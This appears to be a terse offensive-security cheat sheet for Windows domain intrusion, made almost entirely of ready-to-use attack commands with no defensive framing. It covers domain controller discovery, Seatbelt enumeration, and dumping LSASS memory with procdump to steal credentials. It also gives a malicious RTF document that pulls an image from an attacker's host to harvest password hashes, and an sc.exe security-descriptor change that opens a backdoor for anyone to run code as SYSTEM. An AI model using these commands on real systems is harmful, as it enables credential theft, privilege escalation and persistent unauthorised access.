785 B
785 B
-
Host Discovery/Enum
- Find Domain Controller
nslookup -q=srv _ldap._tcp.dc._msdcs.contoso.localnltest /dclist:contoso.local- Requires domain user privs
- Find Domain Controller
-
Seatbelt
- Enumerate proxy settings
seatbelt.exe InternetSettings
- Enumerate proxy settings
-
SysInternals
- ProcDump64.exe
procdump.exe -accepteula -ma lsass.exe lsass.dmp
- ProcDump64.exe
-
Malicious Word document with UNC path for embedded image, for harvesting hashes
{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}
-
Post-Ex persistent, fileless, local privesc backdoor
sc.exe sdset scmanager D:(A;;KA;;;WD)- Set the Security Descriptor on the scmanager to allow everyone to start system services - essentially allowing anyone to run any EXE as local SYSTEM